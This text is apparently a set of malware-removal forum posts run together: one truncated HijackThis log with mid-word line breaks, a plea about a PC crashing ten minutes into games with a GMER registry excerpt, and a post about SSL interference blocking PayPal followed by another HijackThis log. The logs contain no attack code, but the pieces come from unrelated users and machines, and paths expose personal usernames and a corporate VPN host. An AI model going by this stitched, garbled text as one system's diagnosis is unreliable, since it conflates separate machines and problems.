O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll
O2 - BHO: Adobe PDF Conversion Toolbar Helper - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll
O2 - BHO: SkypeIEPluginBHO - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O2 - BHO: URLRedirectionBHO - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\PROGRA~2\MICROS~1\Office14\URLREDIR.DLL
O2 - BHO: Vuze Remote - {ba14329e-9550-4989-b3f2-9732e92d17cc} - C:\Program Files (x86)\Vuze_Remote\prxtbVuze.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll
O2 - BHO: SmartSelect - {F4971EE7-DAA0-4053-9964-665D8EE6A077} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll
O3 - Toolbar: Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll
O3 - Toolbar: Vuze Remote Toolbar - {ba14329e-9550-4989-b3f2-9732e92d17cc} - C:\Program Files (x86)\Vuze_Remote\prxtbVuze.dll
O4 - HKLM\..\Run: [IMSS] "C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IMSS\PIconStartup.exe"
O4 - HKLM\..\Run: [NUSB3MON] "c:\Program Files (x86)\Renesas Electronics\USB 3.0 Host Controller Driver\Application\nusb3mon.exe"
O4 - HKLM\..\Run: [IFXSPMGT] "C:\Program Files (x86)\Hewlett-Packard\Embedded Security Software\ifxspmgt.exe" /NotifyLogon
O4 - HKLM\..\Run: [QLBController] C:\Program Files (x86)\Hewlett-Packard\HP Hotkey Support\QLBController.exe /start
O4 - HKLM\..\Run: [Adobe Acrobat Speed Launcher] "C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\Acrobat_sl.exe"
O4 - HKLM\..\Run: [Acrobat Assistant 8.0] "C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\Acrotray.exe"
O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKLM\..\Run: [StartCCC] "C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" MSRun
O4 - HKLM\..\Run: [AMD AVT] Cmd.exe /c start "AMD Accelerated Video Transcoding device initialization" /min "C:\Program Files (x86)\AMD AVT\bin\kdbsync.exe" aml
O4 - HKLM\..\Run: [BCSSync] "C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe" /DelayServices
O4 - HKLM\..\Run: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
O4 - HKLM\..\Run: [Sophos AutoUpdate Monitor] C:\Program Files (x86)\Sophos\AutoUpdate\almon.exe
O4 - HKLM\..\Run: [Cisco AnyConnect Secure Mobility Agent for Windows] "C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnui.exe" -minimized
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [DivXMediaServer] C:\Program Files (x86)\DivX\DivX Media Server\DivXMediaServer.exe
O4 - HKLM\..\Run: [DivXUpdate] "C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe" /CHECKNOW
O4 - HKCU\..\Run: [Spotify Web Helper] "C:\Users\adam.ransfield\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe"
O4 - HKCU\..\Run: [SDP] C:\Users\adam.ransfield\AppData\Local\FilesFrog Update Checker\update_checker.exe /auto
O4 - HKCU\..\Run: [Skype] "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
O4 - HKCU\..\Run: [BackgroundContainer] "C:\Windows\SysWOW64\Rundll32.exe" "C:\Users\adam.ransfield\AppData\Local\Conduit\BackgroundContainer\BackgroundContainer.dll",DllRun
O4 - HKCU\..\Run: [FLV Player] C:\Users\adam.ransfield\AppData\Local\WebPlayer\FLV Player\WebPlayer.exe
O8 - Extra context menu item: Append Link Target to Existing PDF - res://C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dl

l/AcroIEAppendSelLi

nks.html
O8 - Extra context

menu item: Append

to Existing PDF -

res://C:\Program

Files (x86)\Common

Files\Adobe

\Acrobat\ActiveX

\AcroIEFavClient.dl

l/AcroIEAppend.html
O8 - Extra context

menu item: Convert

Link Target to

Adobe PDF -

res://C:\Program

Files (x86)\Common

Files\Adobe

\Acrobat\ActiveX

\AcroIEFavClient.dl

l/AcroIECaptureSelL

inks.html
O8 - Extra context

menu item: Convert

to Adobe PDF -

res://C:\Program

Files (x86)\Common

Files\Adobe

\Acrobat\ActiveX

\AcroIEFavClient.dl

l/AcroIECapture.htm

l
O8 - Extra context

menu item: E&xport

to Microsoft Excel

- res://C:

\PROGRA~2\MICROS~1\

Office14\EXCEL.EXE/

3000
O8 - Extra context

menu item: Se&nd to

OneNote - res://C:

\PROGRA~2\MICROS~1\

Office14\ONBttnIE.d

ll/105
O9 - Extra button:

Send to OneNote -

{2670000A-7350-

4f3c-8081-

5663EE0C6C49} - C:

\Program Files

(x86)\Microsoft

Office

\Office14\ONBttnIE.

dll
O9 - Extra 'Tools'

menuitem: Se&nd to

OneNote -

{2670000A-7350-

4f3c-8081-

5663EE0C6C49} - C:

\Program Files

(x86)\Microsoft

Office

\Office14\ONBttnIE.

dll
O9 - Extra button:

OneNote Lin&ked

Notes - {789FE86F-

6FC4-46A1-9849-

EDE0DB0C95CA} - C:

\Program Files

(x86)\Microsoft

Office

\Office14\ONBttnIEL

inkedNotes.dll
O9 - Extra 'Tools'

menuitem: OneNote

Lin&ked Notes -

{789FE86F-6FC4-

46A1-9849-

EDE0DB0C95CA} - C:

\Program Files

(x86)\Microsoft

Office

\Office14\ONBttnIEL

inkedNotes.dll
O9 - Extra button:

Skype Click to Call

- {898EA8C8-E7FF-

479B-8935-

AEC46303B9E5} - C:

\Program Files

(x86)\Skype

\Toolbars\Internet

Explorer

\SkypeIEPlugin.dll
O11 - Options

group:

[ACCELERATED_GRAPHI

CS] Accelerated

graphics
O16 - DPF:

{2AB1C516-D654-

4D3A-B3D6-

2185BBCEB409}

(Cisco Systems

WebVPN Relay

Loader) -

https://vpngw.itsny

c.us/+CSCOL

+/relayp.cab
O16 - DPF:

{538793D5-659C-

4639-A56C-

A179AD87ED44}

(Cisco AnyConnect

VPN Client Web

Control) -

https://vpngw.itsny

c.us/CACHE/stc/1/bi

naries/vpnweb.cab
O17 - HKLM\System

\CCS\Services

\Tcpip\Parameters:

Domain =

shift.co.nz
O17 - HKLM\System

\CCS\Services

\Tcpip\..

\{86A5CD3A-33D5-

413B-8DE1-

E619876E614E}:

NameServer =

202.180.64.10,202.1

80.64.11
O17 - HKLM\System

\CS1\Services

\Tcpip\Parameters:

Domain =

shift.co.nz
O17 - HKLM\System

\CS2\Services

\Tcpip\Parameters:

Domain =

shift.co.nz
O18 - Protocol:

oraclesv -

{5900DC32-96D2-

426B-9217-

84C06A0FC0B4} - C:

\Hyperion

\SmartView\Bin

\SVAPPH.dll
O18 - Protocol:

skype-ie-addon-data

- {91774881-D725-

4E58-B298-

07617B9B86A8} - C:

\Program Files

(x86)\Skype

\Toolbars\Internet

Explorer

\SkypeIEPlugin.dll
O18 - Protocol:

skype4com -

{FFC8B962-9B40-

4DFF-9458-

1830C7DD7F5D} - C:

\PROGRA~2\COMMON~1\

Skype\SKYPE4~1.DLL
O18 - Filter

hijack: text/xml -

{807573E5-5146-

11D5-A672-

00B0D022E945} - C:

\Program Files

(x86)\Common Files

\Microsoft Shared

\OFFICE14\MSOXMLMF.

DLL
O20 - AppInit_DLLs:

c:\progra~2\sophos

\sophos~1\sophos~1.

dll
O23 - Service:

Adobe Flash Player

Update Service

(AdobeFlashPlayerUp

dateSvc) - Adobe

Systems

Incorporated - C:

\Windows

\SysWOW64\Macromed

\Flash

\FlashPlayerUpdateS

ervice.exe
O23 - Service:

Andrea ST Filters

Service

(AESTFilters) -

Andrea Electronics

Corporation - C:

\Program Files\IDT

\WDM\AESTSr64.exe
O23 - Service:

Agere Modem Call

Progress Audio

(AgereModemAudio) -

LSI Corporation -

C:\Program Files

\LSI SoftModem

\agr64svc.exe
O23 - Service: @

%SystemRoot%

\system32\Alg.exe,-

112 (ALG) - Unknown

owner - C:\Windows

\System32\alg.exe

(file missing)
O23 - Service: AMD

External Events

Utility - Unknown

owner - C:\Windows

\system32\atiesrxx.

exe (file missing)
O23 - Service:

Apple Mobile Device

- Apple Inc. - C:

\Program Files

(x86)\Common Files

\Apple\Mobile

Device Support

\AppleMobileDeviceS

ervice.exe
O23 - Service:

Bonjour Service -

Apple Inc. - C:

\Program Files

\Bonjour

\mDNSResponder.exe
O23 - Service: @C:

\Program Files

\Hewlett-Packard\HP

ProtectTools

Security Manager

\Bin\DpHostW.exe,-

128 (DpHost) -

DigitalPersona,

Inc. - C:\Program

Files\Hewlett-

Packard\HP

ProtectTools

Security Manager

\Bin\DpHostW.exe
O23 - Service: @

%SystemRoot%

\system32\efssvc.dl

l,-100 (EFS) -

Unknown owner - C:

\Windows

\System32\lsass.exe

(file missing)
O23 - Service: @

%systemroot%

\system32\fxsresm.d

ll,-118 (Fax) -

Unknown owner - C:

\Windows

\system32\fxssvc.ex

e (file missing)
O23 - Service:

FLEXnet Licensing

Service -

Macrovision Europe

Ltd. - C:\Program

Files (x86)\Common

Files\Macrovision

Shared\FLEXnet

Publisher

\FNPLicensingServic

e.exe
O23 - Service:

Google Update

Service (gupdate)

(gupdate) - Google

Inc. - C:\Program

Files (x86)\Google

\Update

\GoogleUpdate.exe
O23 - Service:

Google Update

Service (gupdatem)

(gupdatem) - Google

Inc. - C:\Program

Files (x86)\Google

\Update

\GoogleUpdate.exe
O23 - Service: HP

Quick

Synchronization

Service

(HPDrvMntSvc.exe) -

Hewlett-Packard

Company - C:

\Program Files

(x86)\Hewlett-

Packard\Shared

\HPDrvMntSvc.exe
O23 - Service:

hpHotkeyMonitor -

Hewlett-Packard

Company - C:

\Program Files

(x86)\Hewlett-

Packard\HP Hotkey

Support

\HPHotkeyMonitor.ex

e
O23 - Service: HP

Software Framework

Service (hpqwmiex)

- Hewlett-Packard

Company - C:

\Program Files

(x86)\Hewlett-

Packard\Shared

\hpqWmiEx.exe
O23 - Service: HP

Service (hpsrv) -

Unknown owner - C:

\Windows

\system32\Hpservice

.exe (file missing)
O23 - Service: @

%SystemRoot%

\system32\ieetwcoll

ectorres.dll,-1000

(IEEtwCollectorServ

ice) - Unknown

owner - C:\Windows

\system32\IEEtwColl

ector.exe (file

missing)
O23 - Service:

Security Platform

Management Service

(IFXSpMgtSrv) -

Infineon

Technologies AG -

C:\Program Files

(x86)\Hewlett-

Packard\Embedded

Security Software

\ifxspmgt.exe
O23 - Service:

Trusted Platform

Core Service

(IFXTCS) - Infineon

Technologies AG -

C:\Program Files

(x86)\Hewlett-

Packard\Embedded

Security Software

\ifxtcs.exe
O23 - Service: iPod

Service - Apple

Inc. - C:\Program

Files\iPod\bin

\iPodService.exe
O23 - Service:

@keyiso.dll,-100

(KeyIso) - Unknown

owner - C:\Windows

\system32\lsass.exe

(file missing)
O23 - Service:

Intel(R) Management

and Security

Application Local

Management Service

(LMS) - Intel

Corporation - C:

\Program Files

(x86)\Intel\Intel

(R) Management

Engine Components

\LMS\LMS.exe
O23 - Service:

@comres.dll,-2797

(MSDTC) - Unknown

owner - C:\Windows

\System32\msdtc.exe

(file missing)
O23 - Service: @

%SystemRoot%

\System32\netlogon.

dll,-102 (Netlogon)

- Unknown owner -

C:\Windows

\system32\lsass.exe

(file missing)
O23 - Service:

NitroPDFDriverCreat

orReadSpool9

(NitroDriverReadSpo

ol9) - Nitro PDF

Software - C:

\Program Files

\Common Files

\Nitro\Pro

\9.0\NitroPDFDriver

Service9x64.exe
O23 - Service:

Nalpeiron Licensing

Service (nlsX86cc)

- Nalpeiron Ltd. -

C:\Windows

\SysWOW64\NLSSRV32.

EXE
O23 - Service:

Personal Secure

Drive Service

(PersonalSecureDriv

eService) -

Infineon

Technologies AG -

C:\Program Files

(x86)\Hewlett-

Packard\Embedded

Security Software

\IfxPsdSv.exe
O23 - Service: @

%systemroot%

\system32\psbase.dl

l,-300

(ProtectedStorage)

- Unknown owner -

C:\Windows

\system32\lsass.exe

(file missing)
O23 - Service: @

%systemroot%

\system32\Locator.e

xe,-2 (RpcLocator)

- Unknown owner -

C:\Windows

\system32\locator.e

xe (file missing)
O23 - Service: @

%SystemRoot%

\system32\samsrv.dl

l,-1 (SamSs) -

Unknown owner - C:

\Windows

\system32\lsass.exe

(file missing)
O23 - Service:

Sophos Anti-Virus

status reporter

(SAVAdminService) -

Sophos Limited -

C:\Program Files

(x86)\Sophos\Sophos

Anti-Virus

\SAVAdminService.ex

e
O23 - Service:

Sophos Anti-Virus

(SAVService) -

Sophos Limited -

C:\Program Files

(x86)\Sophos\Sophos

Anti-Virus

\SavService.exe
O23 - Service:

Skype Updater

(SkypeUpdate) -

Skype Technologies

- C:\Program Files

(x86)\Skype

\Updater

\Updater.exe
O23 - Service: @

%SystemRoot%

\system32\snmptrap.

exe,-3 (SNMPTRAP) -

Unknown owner - C:

\Windows

\System32\snmptrap.

exe (file missing)
O23 - Service:

Sophos Agent -

Sophos Limited -

C:\Program Files

(x86)\Sophos\Remote

Management System

\ManagementAgentNT.

exe
O23 - Service:

Sophos AutoUpdate

Service - Sophos

Limited - C:

\Program Files

(x86)\Sophos

\AutoUpdate

\ALsvc.exe
O23 - Service:

Sophos Message

Router - Sophos

Limited - C:

\Program Files

(x86)\Sophos\Remote

Management System

\RouterNT.exe
O23 - Service:

Sophos Web Control

Service - Sophos

Limited - C:

\Program Files

(x86)\Sophos\Sophos

Anti-Virus\Web

Control

\swc_service.exe
O23 - Service: @

%systemroot%

\system32\spoolsv.e

xe,-1 (Spooler) -

Unknown owner - C:

\Windows

\System32\spoolsv.e

xe (file missing)
O23 - Service: @

%SystemRoot%

\system32\sppsvc.ex

e,-101 (sppsvc) -

Unknown owner - C:

\Windows

\system32\sppsvc.ex

e (file missing)
O23 - Service: @

%SystemRoot%

\system32\stlang64.

dll,-10101 (STacSV)

- IDT, Inc. - C:

\Program Files\IDT

\WDM\STacSV64.exe
O23 - Service:

Sophos Web

Intelligence

Service

(swi_service) -

Sophos Limited -

C:\Program Files

(x86)\Sophos\Sophos

Anti-Virus\Web

Intelligence

\swi_service.exe
O23 - Service:

Sophos Web

Intelligence Update

(swi_update_64) -

Sophos Limited -

C:\ProgramData

\Sophos\Web

Intelligence

\swi_update_64.exe
O23 - Service: Tor

Win32 Service (tor)

- Unknown owner -

C:\Program Files

(x86)\Tor\tor.exe
O23 - Service: @

%SystemRoot%

\system32\ui0detect

.exe,-101

(UI0Detect) -

Unknown owner - C:

\Windows

\system32\UI0Detect

.exe (file missing)
O23 - Service:

Intel(R) Management

and Security

Application User

Notification

Service (UNS) -

Intel Corporation -

C:\Program Files

(x86)\Intel\Intel

(R) Management

Engine Components

\UNS\UNS.exe
O23 - Service: @

%SystemRoot%

\system32\vaultsvc.

dll,-1003

(VaultSvc) -

Unknown owner - C:

\Windows

\system32\lsass.exe

(file missing)
O23 - Service:

Validity VCS

Fingerprint Service

(vcsFPService) -

Validity Sensors,

Inc. - C:\Windows

\system32\vcsFPServ

ice.exe
O23 - Service: @

%SystemRoot%

\system32\vds.exe,-

100 (vds) - Unknown

owner - C:\Windows

\System32\vds.exe

(file missing)
O23 - Service:

Cisco AnyConnect

Secure Mobility

Agent (vpnagent) -

Cisco Systems, Inc.

- C:\Program Files

(x86)\Cisco\Cisco

AnyConnect Secure

Mobility Client

\vpnagent.exe
O23 - Service: @

%systemroot%

\system32\vssvc.exe

,-102 (VSS) -

Unknown owner - C:

\Windows

\system32\vssvc.exe

(file missing)
O23 - Service: @

%SystemRoot%

\system32\Wat

\WatUX.exe,-601

(WatAdminSvc) -

Unknown owner - C:

\Windows

\system32\Wat

\WatAdminSvc.exe

(file missing)
O23 - Service: @

%systemroot%

\system32\wbengine.

exe,-104 (wbengine)

- Unknown owner -

C:\Windows

\system32\wbengine.

exe (file missing)
O23 - Service:

Mobile Broadband

Service

(WMCoreService) -

Ericsson AB - C:

\Program Files

(x86)\Ericsson

\Mobile Broadband

Drivers\WMCore

\mini_WMCore.exe
O23 - Service: @

%Systemroot%

\system32\wbem

\wmiapsrv.exe,-110

(wmiApSrv) -

Unknown owner - C:

\Windows

\system32\wbem

\WmiApSrv.exe (file

missing)
O23 - Service: @

%PROGRAMFILES%

\Windows Media

Player

\wmpnetwk.exe,-101

(WMPNetworkSvc) -

Unknown owner - C:

\Program Files

(x86)\Windows Media

Player\wmpnetwk.exe

(file missing)

--
End of file - 18297

bytes


------------------------------------------------------------

Computer Hard Crashes 10 minutes into games.

Above is approximately 20% of the GMER log. It is difficult to parse out 10k characters per post and as of yet I am unsure if you want it like this.

This is the end of the log.

---- Registry - GMER 2.1 ----

Reg HKLM\SYSTEM\ControlSet002\Control\Session Manager@CriticalSectionTimeout 2592000
Reg HKLM\SYSTEM\ControlSet002\Control\Session Manager@GlobalFlag 0
Reg HKLM\SYSTEM\ControlSet002\Control\Session Manager@HeapDeCommitFreeBlockThreshold 0
Reg HKLM\SYSTEM\ControlSet002\Control\Session Manager@HeapDeCommitTotalFreeThreshold 0
Reg HKLM\SYSTEM\ControlSet002\Control\Session Manager@HeapSegmentCommit 0
Reg HKLM\SYSTEM\ControlSet002\Control\Session Manager@HeapSegmentReserve 0
Reg HKLM\SYSTEM\ControlSet002\Control\Session Manager@ProcessorControl 2
Reg HKLM\SYSTEM\ControlSet002\Control\Session Manager@ResourceTimeoutCount 648000
Reg HKLM\SYSTEM\ControlSet002\Control\Session Manager@BootExecute autocheck autochk *?
Reg HKLM\SYSTEM\ControlSet002\Control\Session Manager@ExcludeFromKnownDlls
Reg HKLM\SYSTEM\ControlSet002\Control\Session Manager@ObjectDirectories \Windows?\RPC Control?
Reg HKLM\SYSTEM\ControlSet002\Control\Session Manager@ProtectionMode 1
Reg HKLM\SYSTEM\ControlSet002\Control\Session Manager@NumberOfInitialSessions 2
Reg HKLM\SYSTEM\ControlSet002\Control\Session Manager@SetupExecute

---- EOF - GMER 2.1 ----

Cannot connect to the real www.paypal.com

Hello, from what I found online this interference appears to be malware. I have used Malwarebytes and other scan and remove programs but to no avail.
The SSL Error states that "Something is currently interfering with your secure connection to www.paypal.com."
My Kaspersky Anti-Virus is blocking the site due to potential security problems.
Any ideas as to how I can access the real paypal and remove the malware from my system?

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 12:17:12 PM, on 5/11/2014
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v11.0 (11.00.9600.17041)
Boot mode: Normal

Running processes:
C:\Program Files (x86)\ASUS\AI Suite II\DIGI+ Power Control\PowerControlHelp.exe
C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\TabTip32.exe
C:\Program Files (x86)\ASUS\AI Suite II\AsRoutineController.exe
C:\Program Files (x86)\ASUS\AI Suite II\Remote GO!\AssistTools\WiFi GO! Server.exe
C:\Program Files (x86)\ASUS\AI Suite II\TurboV EVO\TurboVHelp.exe
C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
C:\Program Files (x86)\ASUS\AI Suite II\Network iControl\NetSvcHelp\NetSvcHelp.exe
C:\Program Files (x86)\ASUS\AI Suite II\Network iControl\NetSvcHelp\NetiCtrlTray.exe
C:\Program Files (x86)\ASUS\AI Suite II\EPU\EPUHelp.exe
C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
C:\Program Files (x86)\ASUS\AI Suite II\AI Suite II.exe
C:\Program Files (x86)\ASUS\AI Suite II\Sensor\AlertHelper\AlertHelper.exe
C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe
C:\Program Files (x86)\ASUS\AI Suite II\Remote GO!\AsDLNAServerReal.exe
C:\Program Files (x86)\InstallShield Installation Information\{E6931688-DA2B-4E16-8539-3D323D69C677}\AiChargerPlus.exe
C:\Program Files (x86)\ASUS\AI Suite II\Remote GO!\AssistTools\WiFile\WiFileTransfer.exe
C:\Program Files (x86)\Thermaltake Challenger Pro\Ttsystray.exe
C:\Program Files (x86)\Razer\Imperator\RazerImperatorSysTray.exe
C:\Program Files (x86)\Bamboo Dock\BambooCore.exe
C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2013\avp.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2013\klwtblfs.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Users\David\Downloads\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://search.yahoo.com?type=937811&fr=spigot-yhp-ie
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/p/?LinkId=255141
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/p/?LinkId=255141
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local;<local>
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
F2 - REG:system.ini: UserInit=userinit.exe,
O2 - BHO: ContentBlockerBrowserHelperObject - {5564CC73-EFA7-4CBF-918A-5CF7FBBFFF4F} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2013\IEExt\ContentBlocker\ie_content_blocker_plugin.dll
O2 - BHO: VirtualKeyboardBrowserHelperObject - {73455575-E40C-433C-9784-C78DC7761455} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2013\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll
O2 - BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Safe Money Plugin - {9E6D0D23-3D72-4A94-AE1F-2D167624E3D9} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2013\IEExt\OnlineBanking\online_banking_bho.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll
O2 - BHO: link filter bho - {E33CF602-D945-461A-83F0-819F76A199F8} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2013\IEExt\UrlAdvisor\klwtbbho.dll
O4 - HKLM\..\Run: [ASUS AiChargerPlus Execute] C:\Program Files (x86)\InstallShield Installation Information\{E6931688-DA2B-4E16-8539-3D323D69C677}\AiChargerPlus.exe
O4 - HKLM\..\Run: [ASUS WiFi GO! FileTransfer Execute] C:\Program Files (x86)\ASUS\AI Suite II\Remote GO!\AssistTools\WiFile\WiFileTransfer.exe
O4 - HKLM\..\Run: [ChallengerPro] "C:\Program Files (x86)\Thermaltake Challenger Pro\Ttsystray.exe"
O4 - HKLM\..\Run: [Razer Imperator Driver] C:\Program Files (x86)\Razer\Imperator\RazerImperatorSysTray.exe
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKLM\..\Run: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
O4 - HKLM\..\Run: [BambooCore] C:\Program Files (x86)\Bamboo Dock\BambooCore.exe
O4 - HKLM\..\Run: [AVP] "C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2013\avp.exe"
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [mobilegeni daemon] C:\Program Files (x86)\Mobogenie\DaemonProcess.exe
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
O4 - HKLM\..\Run: [LogMeIn Hamachi Ui] "C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe" --auto-start
O4 - HKCU\..\Run: [Pando Media Booster] C:\Program Files (x86)\Pando Networks\Media Booster\PMB.exe
O4 - HKCU\..\Run: [Akamai NetSession Interface] "C:\Users\David\AppData\Local\Akamai\netsession_win.exe"
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-19\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-20\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'NETWORK SERVICE')
O4 - Startup: CurseClientStartup.ccip
O4 - Startup: Launch Utility Application.lnk = David\AppData\Roaming\Verizon\UA_ar\UtilityApplication.exe
O8 - Extra context menu item: Add to Anti-Banner - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2013\ie_banner_deny.htm
O9 - Extra button: Virtual Keyboard - {0C4CC089-D306-440D-9772-464E226F6539} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2013\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll
O9 - Extra button: URLs check - {CCF151D8-D089-449F-A5A4-D9909053F20F} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2013\IEExt\UrlAdvisor\klwtbbho.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~2\COMMON~1\Skype\SKYPE4~1.DLL
O18 - Protocol: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
O23 - Service: Adobe Active File Monitor V9 (AdobeActiveFileMonitor9.0) - Adobe Systems Incorporated - C:\Program Files (x86)\Adobe\Elements 9 Organizer\PhotoshopElementsFileAgent.exe
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
O23 - Service: ASUS Com Service (asComSvc) - Unknown owner - C:\Program Files (x86)\ASUS\AXSP\1.00.18\atkexComSvc.exe
